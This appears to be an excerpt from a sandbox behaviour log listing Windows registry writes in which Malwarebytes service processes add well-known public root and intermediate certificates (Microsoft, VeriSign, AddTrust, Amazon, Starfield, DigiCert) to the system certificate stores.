Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 5c0000000100000004000000001000001900000001000000100000009f687581f7ef744ecfc12b9cee6238f10f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa2140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2040000000100000010000000be954f16012122448ca8bc279602acf52000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 5c000000010000000400000000040000190000000100000010000000e53d34cecb05c17ee332c749d78c02560f000000010000001000000065fc47520f66383962ec0b7b88a0821d03000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd2509000000010000000c000000300a06082b060105050703080b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e00670020004300410000001400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f0040000000100000010000000ebb04f1d3a2e372f1dda6e27d6b680fa2000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 0f0000000100000010000000a2011111cc748d961c35c67a0d5c8af5620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce446090000000100000016000000301406082b0601050507030306082b06010505070304140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea0b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000177f789e96523e206c796917c848d50f7e0000000100000008000000000010c51e92d201680000000100000008000000000036044ddfd30103000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b20000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A\Blob = 0300000001000000140000005a8cef45d7a69859767a8c8b4496b578cf474b1a2000000001000000450500003082054130820329a0030201020213066c9fd29635869f0a0fe58678f85b26bb8a37300d06092a864886f70d01010c05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412032301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203230820222300d06092a864886f70d01010105000382020f003082020a0282020100ad969f2d9c4a4c4a81795199ec8acb6b605113bc4d6d06fcb0088ddd19106ac7260c35d8c06f2084e994b19b8503c35bdb4ae8c8f89076d95b4fe34ce806364dcc9aac3d0c902b92d4061960ac374479858182ad5a37e00dcc9da64c5276ea439db704d150f655e0d5d2a64985e937e9ca7eae5c954d489a3fae205a6d8895d934b8521a4390b0bf6c05b9b678b7ead0e43a3c125362ff4af27bbe3505a91234e3f36474622c3d00495a28fe3244bb87dd652702713bda4af71fdacdf72155904f0fecae82e19f6bd945d3bbf05f87ed3c2c3986da3fdeec7255eb79a3addbdd7cb0ba1ccefcde4f3576cf0ff8781f6a36514627615be99ecff0a2557d7c258a6f2fb4c5cf842e2bfd0d51106cfb5f1bbc1b7ec5ae3b98013192ff0b57f49ab2b957e9abef0d76d1f0eef4ce86a7e06ee9b469a1df69f633c6692e97139ea587b057108137c953b3bb7ff692d19cd018f4926eda834fa663994ca5fb5eef21647a205f6c648515cb37e9620c0b2a16dc012e32da3e4bf59e3af6174094ef9e910886fabe63a85a33eccb744395f96c695236c7296ffc55035c1ffb9fbd47ebe74947950b4e89220949e0f5611ef1bf2e8a726e8059ff573af97532a34e5feced2862d94d73f2cc811760edcdebdcdba7cac57e02bdf2540854fdb42d092c17544a98d154e1516708d2ed6e7e6f3fd22d81592966cb903995111e7427feddebaf0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414b00cf04c30f405580248fd33e552af4b84e36652300d06092a864886f70d01010c05000382020100aaa8808f0e78a3e0a2d4cde6f5987a3bea0003b0970e93bc5aa8f62c8c7287a9b1fc7f73fd637178a58759cf30e10d10b2135a6d82f56ae6809fa0050b68e4476bc76adfb6fd773272e518fa09f4a0932c5dd28c75857665900c0379b7312363ad788309866884cafff9cf269a9279e7cd4bc5e761a717cbf3a91293936ba7e82f5392c46058b0cc0251185b858d625963b6adb4de9afb26f70027c05d55377499c9507fe3592e44e32c25eeec4c3277b49f1ae94b5d20c5dafd1c8716c643e8d4bb269a45705ea90b3753e2467b27fde046f289b7cc42b6cb28266ed9a5c93ac8411360f7508c15aeb26d1a151a5778e6922ad96590823f6c02afae123a27963604d71da28063a99bf1e5bab47c14b04ec9b11f745f38f651ea9bfa2ca211d4a92d271a45b1afb24e710dc05846d66906cb53cbb3fe6b41cd417e7d4c0f7c72797a59cd5e4a0eac9ba99873797cb4f4ccb9b8070cb2745cb8c76f88a190a7f4aaf9bf673af41a15621eb79fbe3db129af67a112f25810195303301bb81a89f69cbd97038ea309f31d8b21f1b4dfe41cd19f650206ea5cd613b384efa2a55c8c7729a768c06bae40d2a8b4eacdf08d4b389c199a1b2854b88990efca75813e1ef26424c718af4eff479e07f63565a4d30a56fff517646cefa822254993b6df0017da587e5deec51bb0d1d15f2110c7f9f3ba020a2707c5f1d6c7d3e0fb09606c C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 040000000100000010000000be954f16012122448ca8bc279602acf5140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa20f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e1900000001000000100000009f687581f7ef744ecfc12b9cee6238f12000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e2000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa22000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD\Blob = 0300000001000000140000001c58a3a8518e8759bf075b76b750d4f2df264fcd2000000001000000c2040000308204be308203a6a003020102021006d8d904d5584346f68a2fa754227ec4300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3231303431343030303030305a170d3331303431333233353935395a304f310b300906035504061302555331153013060355040a130c446967694365727420496e633129302706035504031320446967694365727420544c53205253412053484132353620323032302043413130820122300d06092a864886f70d01010105000382010f003082010a0282010100c14bb3654770bcdd4f58dbec9cedc366e51f311354ad4a66461f2c0aec6407e52edcdcb90a20eddfe3c4d09e9aa97a1d8288e51156db1e9f58c251e72c340d2ed292e156cbf1795fb3bb87ca25037b9a52416610604f571349f0e8376783dfe7d34b674c2251a6df0e9910ed57517426e27dc7ca622e131b7f238825536fc13458008b84fff8bea75849227b96ada2889b15bca07cdfe951a8d5b0ed37e236b4824b62b5499aecc767d6e33ef5e3d6125e44f1bf71427d58840380b18101faf9ca32bbb48e278727c52b74d4a8d697dec364f9cace53a256bc78178e490329aefb494fa415b9cef25c19576d6b79a72ba2272013b5d03d40d321300793ea99f50203010001a38201823082017e30120603551d130101ff040830060101ff020100301d0603551d0e04160414b76ba2eaa8aa848c79eab4da0f98b2c59576b9f4301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302307606082b06010505070101046a3068302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304006082b060105050730028634687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63727430420603551d1f043b30393037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63726c303d0603551d2004363034300b06096086480186fd6c02013007060567810c01013008060667810c0102013008060667810c0102023008060667810c010203300d06092a864886f70d01010b050003820101008032ce5e0bdd6e5a0d0aafe1d684cbc08efa8570edda5db30cf72b7540fe850afaf33178b7704b1a8958ba80bdf36b1de97ecf0bba589c59d490d3fd6cfdd0986db771825bcf6d0b5a09d07bdec443d82aa4de9e41265fbb8f99cbddaee1a86f9f87fe74b71f1b20abb14fc6f5675d5d9b3ce9ff69f7616cd6d9f3fd36c6ab038876d24b2e7586e3fcd8557d26c21177df3e02b67cf3ab7b7a86366fb8f7d89371cf86df7330fa7babed2a59c842843b11171a52f3c90e147da25b7267ba71ed574766c5b8024a65345e8bd02a3c209c51994ce7529ef76b112b0d927e1de88aeb36164387ea2a63bf753febdec403bb0a3cf730efebaf4cfc8b3610733ef3a4 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
